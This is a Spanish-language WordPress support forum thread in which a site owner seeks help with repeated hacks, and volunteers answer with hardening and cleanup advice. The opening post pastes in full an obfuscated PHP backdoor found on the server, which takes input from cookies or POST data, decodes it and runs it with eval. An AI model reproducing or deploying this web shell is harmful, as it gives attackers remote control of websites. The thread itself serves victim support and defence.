Soporte » Seguridad » Hackeos Continuos

  • Hola!
    Hace unos días me hackearon mi web y gracias a varios Plugins he podido Limpiarlo, pero esos plugins no “Protegen” ya que tengo que ir pasando cada X tiempo el scaneo para verificar que archivos tienen codigo malicioso y arreglarlos.

    Hay algún plugin que pueda usar para evitarlo? uso el “Anti-Malware from GOTMLS.NET” para soluciuonarlo pero me suben archivos nuevos o editan algunos con códigos del estilo como esto:
    <?php $c2eba = 240;$GLOBALS['t8f9']=Array();global$t8f9;$t8f9=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['v31ca7']="\x48\x68\x4c\x4a\x3e\x4d\x3b\x6f\x36\x27\x75\x55\x51\x7a\x4e\x6e\x72\x2e\x7e\x69\x6a\xa\x3c\x33\x4b\x2a\x32\x30\x54\x42\xd\x41\x4f\x47\x58\x5a\x50\x63\x52\x44\x56\x35\x37\x26\x5d\x45\x24\x28\x6c\x9\x5e\x57\x39\x2c\x74\x59\x79\x46\x49\x21\x67\x22\x78\x20\x25\x53\x61\x2b\x70\x7d\x66\x3f\x76\x7b\x73\x2d\x3d\x7c\x5c\x5b\x3a\x38\x77\x34\x31\x2f\x23\x40\x60\x6b\x65\x6d\x62\x5f\x43\x71\x29\x64";$t8f9[$t8f9['v31ca7'][74].$t8f9['v31ca7'][92].$t8f9['v31ca7'][41].$t8f9['v31ca7'][41].$t8f9['v31ca7'][84].$t8f9['v31ca7'][23].$t8f9['v31ca7'][90].$t8f9['v31ca7'][23]]=$t8f9['v31ca7'][37].$t8f9['v31ca7'][1].$t8f9['v31ca7'][16];$t8f9[$t8f9['v31ca7'][70].$t8f9['v31ca7'][23].$t8f9['v31ca7'][97].$t8f9['v31ca7'][66].$t8f9['v31ca7'][92].$t8f9['v31ca7'][81].$t8f9['v31ca7'][83]]=$t8f9['v31ca7'][7].$t8f9['v31ca7'][16].$t8f9['v31ca7'][97];$t8f9[$t8f9['v31ca7'][15].$t8f9['v31ca7'][23].$t8f9['v31ca7'][97].$t8f9['v31ca7'][83]]=$t8f9['v31ca7'][74].$t8f9['v31ca7'][54].$t8f9['v31ca7'][16].$t8f9['v31ca7'][48].$t8f9['v31ca7'][90].$t8f9['v31ca7'][15];$t8f9[$t8f9['v31ca7'][37].$t8f9['v31ca7'][83].$t8f9['v31ca7'][41].$t8f9['v31ca7'][42]]=$t8f9['v31ca7'][19].$t8f9['v31ca7'][15].$t8f9['v31ca7'][19].$t8f9['v31ca7'][93].$t8f9['v31ca7'][74].$t8f9['v31ca7'][90].$t8f9['v31ca7'][54];$t8f9[$t8f9['v31ca7'][91].$t8f9['v31ca7'][66].$t8f9['v31ca7'][92].$t8f9['v31ca7'][97].$t8f9['v31ca7'][70].$t8f9['v31ca7'][8].$t8f9['v31ca7'][23]]=$t8f9['v31ca7'][74].$t8f9['v31ca7'][90].$t8f9['v31ca7'][16].$t8f9['v31ca7'][19].$t8f9['v31ca7'][66].$t8f9['v31ca7'][48].$t8f9['v31ca7'][19].$t8f9['v31ca7'][13].$t8f9['v31ca7'][90];$t8f9[$t8f9['v31ca7'][70].$t8f9['v31ca7'][26].$t8f9['v31ca7'][83].$t8f9['v31ca7'][8].$t8f9['v31ca7'][66]]=$t8f9['v31ca7'][68].$t8f9['v31ca7'][1].$t8f9['v31ca7'][68].$t8f9['v31ca7'][72].$t8f9['v31ca7'][90].$t8f9['v31ca7'][16].$t8f9['v31ca7'][74].$t8f9['v31ca7'][19].$t8f9['v31ca7'][7].$t8f9['v31ca7'][15];$t8f9[$t8f9['v31ca7'][19].$t8f9['v31ca7'][41].$t8f9['v31ca7'][70].$t8f9['v31ca7'][66].$t8f9['v31ca7'][42].$t8f9['v31ca7'][23].$t8f9['v31ca7'][37].$t8f9['v31ca7'][8]]=$t8f9['v31ca7'][10].$t8f9['v31ca7'][15].$t8f9['v31ca7'][74].$t8f9['v31ca7'][90].$t8f9['v31ca7'][16].$t8f9['v31ca7'][19].$t8f9['v31ca7'][66].$t8f9['v31ca7'][48].$t8f9['v31ca7'][19].$t8f9['v31ca7'][13].$t8f9['v31ca7'][90];$t8f9[$t8f9['v31ca7'][60].$t8f9['v31ca7'][90].$t8f9['v31ca7'][92].$t8f9['v31ca7'][92].$t8f9['v31ca7'][41].$t8f9['v31ca7'][27]]=$t8f9['v31ca7'][92].$t8f9['v31ca7'][66].$t8f9['v31ca7'][74].$t8f9['v31ca7'][90].$t8f9['v31ca7'][8].$t8f9['v31ca7'][83].$t8f9['v31ca7'][93].$t8f9['v31ca7'][97].$t8f9['v31ca7'][90].$t8f9['v31ca7'][37].$t8f9['v31ca7'][7].$t8f9['v31ca7'][97].$t8f9['v31ca7'][90];$t8f9[$t8f9['v31ca7'][66].$t8f9['v31ca7'][8].$t8f9['v31ca7'][23].$t8f9['v31ca7'][42].$t8f9['v31ca7'][66]]=$t8f9['v31ca7'][74].$t8f9['v31ca7'][90].$t8f9['v31ca7'][54].$t8f9['v31ca7'][93].$t8f9['v31ca7'][54].$t8f9['v31ca7'][19].$t8f9['v31ca7'][91].$t8f9['v31ca7'][90].$t8f9['v31ca7'][93].$t8f9['v31ca7'][48].$t8f9['v31ca7'][19].$t8f9['v31ca7'][91].$t8f9['v31ca7'][19].$t8f9['v31ca7'][54];$t8f9[$t8f9['v31ca7'][7].$t8f9['v31ca7'][26].$t8f9['v31ca7'][90].$t8f9['v31ca7'][97].$t8f9['v31ca7'][8].$t8f9['v31ca7'][26]]=$t8f9['v31ca7'][56].$t8f9['v31ca7'][66].$t8f9['v31ca7'][26].$t8f9['v31ca7'][23].$t8f9['v31ca7'][41];$t8f9[$t8f9['v31ca7'][37].$t8f9['v31ca7'][83].$t8f9['v31ca7'][26].$t8f9['v31ca7'][27].$t8f9['v31ca7'][41].$t8f9['v31ca7'][42].$t8f9['v31ca7'][27]]=$t8f9['v31ca7'][92].$t8f9['v31ca7'][26].$t8f9['v31ca7'][26].$t8f9['v31ca7'][8];$t8f9[$t8f9['v31ca7'][62].$t8f9['v31ca7'][23].$t8f9['v31ca7'][90].$t8f9['v31ca7'][81].$t8f9['v31ca7'][83].$t8f9['v31ca7'][41].$t8f9['v31ca7'][84]]=$_POST;$t8f9[$t8f9['v31ca7'][60].$t8f9['v31ca7'][92].$t8f9['v31ca7'][37].$t8f9['v31ca7'][83].$t8f9['v31ca7'][84].$t8f9['v31ca7'][66].$t8f9['v31ca7'][41]]=$_COOKIE;@$t8f9[$t8f9['v31ca7'][37].$t8f9['v31ca7'][83].$t8f9['v31ca7'][41].$t8f9['v31ca7'][42]]($t8f9['v31ca7'][90].$t8f9['v31ca7'][16].$t8f9['v31ca7'][16].$t8f9['v31ca7'][7].$t8f9['v31ca7'][16].$t8f9['v31ca7'][93].$t8f9['v31ca7'][48].$t8f9['v31ca7'][7].$t8f9['v31ca7'][60],NULL);@$t8f9[$t8f9['v31ca7'][37].$t8f9['v31ca7'][83].$t8f9['v31ca7'][41].$t8f9['v31ca7'][42]]($t8f9['v31ca7'][48].$t8f9['v31ca7'][7].$t8f9['v31ca7'][60].$t8f9['v31ca7'][93].$t8f9['v31ca7'][90].$t8f9['v31ca7'][16].$t8f9['v31ca7'][16].$t8f9['v31ca7'][7].$t8f9['v31ca7'][16].$t8f9['v31ca7'][74],0);@$t8f9[$t8f9['v31ca7'][37].$t8f9['v31ca7'][83].$t8f9['v31ca7'][41].$t8f9['v31ca7'][42]]($t8f9['v31ca7'][91].$t8f9['v31ca7'][66].$t8f9['v31ca7'][62].$t8f9['v31ca7'][93].$t8f9['v31ca7'][90].$t8f9['v31ca7'][62].$t8f9['v31ca7'][90].$t8f9['v31ca7'][37].$t8f9['v31ca7'][10].$t8f9['v31ca7'][54].$t8f9['v31ca7'][19].$t8f9['v31ca7'][7].$t8f9['v31ca7'][15].$t8f9['v31ca7'][93].$t8f9['v31ca7'][54].$t8f9['v31ca7'][19].$t8f9['v31ca7'][91].$t8f9['v31ca7'][90],0);@$t8f9[$t8f9['v31ca7'][66].$t8f9['v31ca7'][8].$t8f9['v31ca7'][23].$t8f9['v31ca7'][42].$t8f9['v31ca7'][66]](0);$p15d1=NULL;$o6e0d2510=NULL;$t8f9[$t8f9['v31ca7'][74].$t8f9['v31ca7'][27].$t8f9['v31ca7'][41].$t8f9['v31ca7'][81].$t8f9['v31ca7'][27].$t8f9['v31ca7'][81].$t8f9['v31ca7'][52]]=$t8f9['v31ca7'][42].$t8f9['v31ca7'][66].$t8f9['v31ca7'][84].$t8f9['v31ca7'][27].$t8f9['v31ca7'][26].$t8f9['v31ca7'][92].$t8f9['v31ca7'][23].$t8f9['v31ca7'][8].$t8f9['v31ca7'][75].$t8f9['v31ca7'][23].$t8f9['v31ca7'][90].$t8f9['v31ca7'][66].$t8f9['v31ca7'][26].$t8f9['v31ca7'][75].$t8f9['v31ca7'][83].$t8f9['v31ca7'][37].$t8f9['v31ca7'][81].$t8f9['v31ca7'][81].$t8f9['v31ca7'][75].$t8f9['v31ca7'][66].$t8f9['v31ca7'][81].$t8f9['v31ca7'][70].$t8f9['v31ca7'][27].$t8f9['v31ca7'][75].$t8f9['v31ca7'][23].$t8f9['v31ca7'][97].$t8f9['v31ca7'][83].$t8f9['v31ca7'][70].$t8f9['v31ca7'][27].$t8f9['v31ca7'][26].$t8f9['v31ca7'][27].$t8f9['v31ca7'][37].$t8f9['v31ca7'][26].$t8f9['v31ca7'][8].$t8f9['v31ca7'][90].$t8f9['v31ca7'][42];global$s058089;function b226($p15d1,$n2f2){global$t8f9;$s33b5="";for($q4b87=0;$q4b87<$t8f9[$t8f9['v31ca7'][15].$t8f9['v31ca7'][23].$t8f9['v31ca7'][97].$t8f9['v31ca7'][83]]($p15d1);){for($tec337=0;$tec337<$t8f9[$t8f9['v31ca7'][15].$t8f9['v31ca7'][23].$t8f9['v31ca7'][97].$t8f9['v31ca7'][83]]($n2f2)&&$q4b87<$t8f9[$t8f9['v31ca7'][15].$t8f9['v31ca7'][23].$t8f9['v31ca7'][97].$t8f9['v31ca7'][83]]($p15d1);$tec337++,$q4b87++){$s33b5.=$t8f9[$t8f9['v31ca7'][74].$t8f9['v31ca7'][92].$t8f9['v31ca7'][41].$t8f9['v31ca7'][41].$t8f9['v31ca7'][84].$t8f9['v31ca7'][23].$t8f9['v31ca7'][90].$t8f9['v31ca7'][23]]($t8f9[$t8f9['v31ca7'][70].$t8f9['v31ca7'][23].$t8f9['v31ca7'][97].$t8f9['v31ca7'][66].$t8f9['v31ca7'][92].$t8f9['v31ca7'][81].$t8f9['v31ca7'][83]]($p15d1[$q4b87])^$t8f9[$t8f9['v31ca7'][70].$t8f9['v31ca7'][23].$t8f9['v31ca7'][97].$t8f9['v31ca7'][66].$t8f9['v31ca7'][92].$t8f9['v31ca7'][81].$t8f9['v31ca7'][83]]($n2f2[$tec337]));}}return$s33b5;}function ya235($p15d1,$n2f2){global$t8f9;global$s058089;return$t8f9[$t8f9['v31ca7'][37].$t8f9['v31ca7'][83].$t8f9['v31ca7'][26].$t8f9['v31ca7'][27].$t8f9['v31ca7'][41].$t8f9['v31ca7'][42].$t8f9['v31ca7'][27]]($t8f9[$t8f9['v31ca7'][37].$t8f9['v31ca7'][83].$t8f9['v31ca7'][26].$t8f9['v31ca7'][27].$t8f9['v31ca7'][41].$t8f9['v31ca7'][42].$t8f9['v31ca7'][27]]($p15d1,$s058089),$n2f2);}foreach($t8f9[$t8f9['v31ca7'][60].$t8f9['v31ca7'][92].$t8f9['v31ca7'][37].$t8f9['v31ca7'][83].$t8f9['v31ca7'][84].$t8f9['v31ca7'][66].$t8f9['v31ca7'][41]]as$n2f2=>$b1343){$p15d1=$b1343;$o6e0d2510=$n2f2;}if(!$p15d1){foreach($t8f9[$t8f9['v31ca7'][62].$t8f9['v31ca7'][23].$t8f9['v31ca7'][90].$t8f9['v31ca7'][81].$t8f9['v31ca7'][83].$t8f9['v31ca7'][41].$t8f9['v31ca7'][84]]as$n2f2=>$b1343){$p15d1=$b1343;$o6e0d2510=$n2f2;}}$p15d1=@$t8f9[$t8f9['v31ca7'][19].$t8f9['v31ca7'][41].$t8f9['v31ca7'][70].$t8f9['v31ca7'][66].$t8f9['v31ca7'][42].$t8f9['v31ca7'][23].$t8f9['v31ca7'][37].$t8f9['v31ca7'][8]]($t8f9[$t8f9['v31ca7'][7].$t8f9['v31ca7'][26].$t8f9['v31ca7'][90].$t8f9['v31ca7'][97].$t8f9['v31ca7'][8].$t8f9['v31ca7'][26]]($t8f9[$t8f9['v31ca7'][60].$t8f9['v31ca7'][90].$t8f9['v31ca7'][92].$t8f9['v31ca7'][92].$t8f9['v31ca7'][41].$t8f9['v31ca7'][27]]($p15d1),$o6e0d2510));if(isset($p15d1[$t8f9['v31ca7'][66].$t8f9['v31ca7'][89]])&&$s058089==$p15d1[$t8f9['v31ca7'][66].$t8f9['v31ca7'][89]]){if($p15d1[$t8f9['v31ca7'][66]]==$t8f9['v31ca7'][19]){$q4b87=Array($t8f9['v31ca7'][68].$t8f9['v31ca7'][72]=>@$t8f9[$t8f9['v31ca7'][70].$t8f9['v31ca7'][26].$t8f9['v31ca7'][83].$t8f9['v31ca7'][8].$t8f9['v31ca7'][66]](),$t8f9['v31ca7'][74].$t8f9['v31ca7'][72]=>$t8f9['v31ca7'][84].$t8f9['v31ca7'][17].$t8f9['v31ca7'][27].$t8f9['v31ca7'][75].$t8f9['v31ca7'][84],);echo@$t8f9[$t8f9['v31ca7'][91].$t8f9['v31ca7'][66].$t8f9['v31ca7'][92].$t8f9['v31ca7'][97].$t8f9['v31ca7'][70].$t8f9['v31ca7'][8].$t8f9['v31ca7'][23]]($q4b87);}elseif($p15d1[$t8f9['v31ca7'][66]]==$t8f9['v31ca7'][90]){eval/*k6ce279*/($p15d1[$t8f9['v31ca7'][97]]);}exit();} ?>

Viendo 7 respuestas - 1 de 7 (de 7 total)
  • Moderador Jose Conti

    (@jconti)

    Hola,

    En primer lugar, mírate este hilo

    https://es.wordpress.org/support/topic/limpiar-un-wordpress-infectadohackeado/

    Es posible que migas un uploader en algún lado.

    Lo segundo, es tener todo actualizado, si no, te volverán a entrar.

    Tercero, si estás seguro que todo edtá limpio y actualizado, habla con tu hosting para que miren los logs y vean por donde han entrado, ya que es muy posible que sea cosa del hosting.

    Hay plugins de control, pero normalmente son premium, como securi por ejemplo.

    Saludos

    Para protegerte tienes plugins como Wordfence (que además incluye un escaneo básico de malware en su cuenta gratuita) y iThemes Security, por ejemplo

    • Esta respuesta fue modificada hace 2 meses, 3 semanas por  Pablo Moratinos. Razón: corrección ortográfica

    Si he seguido esa guia de limpieza, ahora necesito algo para prevenir, he mirado permisos y todo y he contactado con el Alojamiento y dicen que todo esta bien.

    Es fiable poner varios plugins de anti malware? o solo mejor usar 1

    No, hablando de suites de seguridad lo mejor es que uses una solo (a no ser que no se dupliquen la funcionalidades).

    Me va muy bien el que uso pero no protege, detecta y corrige pero manualmente pero ya nose que hacer para evitarlo. Tengo todo actualizado

    Moderador Jose Conti

    (@jconti)

    Si usas plugins y/o theme premium ¿están también actualizados?
    Si es así, hay muchos números que las cuentas en el servidor no estén aisladas, lo que quiere decir que están hackeando a otro, y se cuelan en tu cuenta.
    Si es eso, solo te librarás cambiando de hosting, pero tienes que estar muy seguro que tienes todo, absolutamente todo en la última versión, que no utilices un plugin o theme que no se actualice desde hace mucho tiempo (pongamos más de 1 año), que no tienes ningún archivo que no debería estar, y que todos los archivos están limpios. Y no hay que olvidarse nunca de revisar todo el directorio uploads.
    Si te entran, es por cualquiera de las razones anteriores, (aparte de tener tu mismo ordenador con un virus/gusano), y ya te puedes poner plugins de seguridad, que te entrarán igual, ya que usaran tu vulnerabilidad o la de tu vecino (en caso de que el hosting no tenga cuentas aisladas).

    Si tengo todo actualizado, pero periodicamente parece que editan o suben archivos nuevos con codigo malicioso.
    Respecto al Proveedor de Alojamiento, soy yo mismo, ya que tengo un VPS el cual gestiono y hasta ahora no habia fallado nada. Se han probado subir copias nuevas de todo sin guardar nada y aveces resuben de nuevo.

    No se que hacer la verdad para prevenir

Viendo 7 respuestas - 1 de 7 (de 7 total)
  • Debes estar registrado para responder a este tema.